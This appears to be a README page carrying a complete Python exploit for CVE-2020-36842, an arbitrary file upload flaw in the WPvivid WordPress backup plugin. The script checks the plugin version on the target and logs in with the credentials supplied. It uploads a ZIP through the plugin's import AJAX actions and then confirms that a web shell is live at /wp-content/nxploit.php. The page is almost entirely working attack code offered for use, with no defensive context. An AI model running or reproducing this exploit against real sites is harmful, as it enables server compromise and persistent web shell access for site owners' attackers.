README.md
Rendering markdown...
import requests
import os
import time
import argparse
#by Khaled alenazi Nxploit
requests.packages.urllib3.disable_warnings() # Disable SSL verification
session = requests.Session()
session.verify = False
parser = argparse.ArgumentParser(description="CVE-2020-36842 - WPvivid Plugin Arbitrary File Upload Vulnerability")
parser.add_argument("-u", required=True, help="Target WordPress site URL")
parser.add_argument("-un", required=True, help="WordPress username")
parser.add_argument("-p", required=True, help="WordPress password")
args = parser.parse_args()
def check_version(url):
version_url = url + "/wp-content/plugins/wpvivid-backuprestore/readme.txt"
try:
response = session.get(version_url, timeout=10)
if "Stable tag: 0.9.35" in response.text or "Stable tag: 0.9.3" in response.text:
print("[+] Target is vulnerable. Proceeding with exploitation.")
else:
print("[!] Target is not vulnerable.")
exit()
except requests.RequestException as e:
print(f"[!] Version check error: {e}")
exit()
def login(url, username, password):
login_url = url + "/wp-login.php"
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In"
}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}
try:
response = session.post(login_url, data=login_data, headers=headers, timeout=10)
response.raise_for_status()
except requests.RequestException as e:
print(f"[!] Login error: {e}")
exit()
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
else:
print("[!] Login failed.")
exit()
def find_zip_file():
files_in_dir = [f for f in os.listdir('.') if f.endswith('.zip')]
if not files_in_dir:
print("[!] No ZIP file found in the current directory.")
exit()
return files_in_dir[0]
def send_request(data, files=None, retries=3):
for attempt in range(retries):
try:
response = session.post(TARGET_URL, data=data, files=files, timeout=10)
response.raise_for_status()
return response.text
except requests.RequestException as e:
print(f"[!] Request error (Attempt {attempt+1}/{retries}): {e}")
time.sleep(3)
return "[!] All attempts failed."
def main():
check_version(args.u)
login(args.u, args.un, args.p)
file_path = find_zip_file()
print(f"[+] Found file: {file_path}")
files = {"async-upload": (file_path, open(file_path, "rb"), "application/zip")}
data = {"name": file_path, "chunk": "0", "chunks": "1", "action": "wpvivid_upload_import_files"}
print("[+] Uploading file: ", send_request(data, files))
time.sleep(5)
check_file_data = {"action": "wpvivid_check_import_file", "file_name": file_path}
print("[+] Checking file: ", send_request(check_file_data))
time.sleep(5)
upload_complete_data = {
"action": "wpvivid_upload_import_file_complete",
"files": f"[{{\"id\":\"o_1ilg3pu22185h1r7gvmorasib37\",\"name\":\"{file_path}\",\"type\":\"application/zip\",\"size\":2342,\"origSize\":2342,\"loaded\":2342,\"percent\":100,\"status\":5,\"lastModifiedDate\":\"3/4/2025, 3:19:23 AM\"}}]",
}
print("[+] Confirming upload: ", send_request(upload_complete_data))
time.sleep(5)
start_import_data = {"action": "wpvivid_start_import", "file_name": file_path, "user": "1"}
print("[+] Starting import: ", send_request(start_import_data))
time.sleep(5)
progress_data = {"action": "wpvivid_get_import_progress"}
print("[+] Import progress: ", send_request(progress_data))
# Check for shell
shell_url = args.u + "/wp-content/nxploit.php"
try:
response = session.get(shell_url, timeout=10)
if response.status_code == 200:
print("[+] Shell uploaded successfully at:", shell_url)
else:
print("[!] Shell not found.")
except requests.RequestException as e:
print(f"[!] Shell check error: {e}")
if __name__ == "__main__":
TARGET_URL = args.u + "/wp-admin/admin-ajax.php"
main()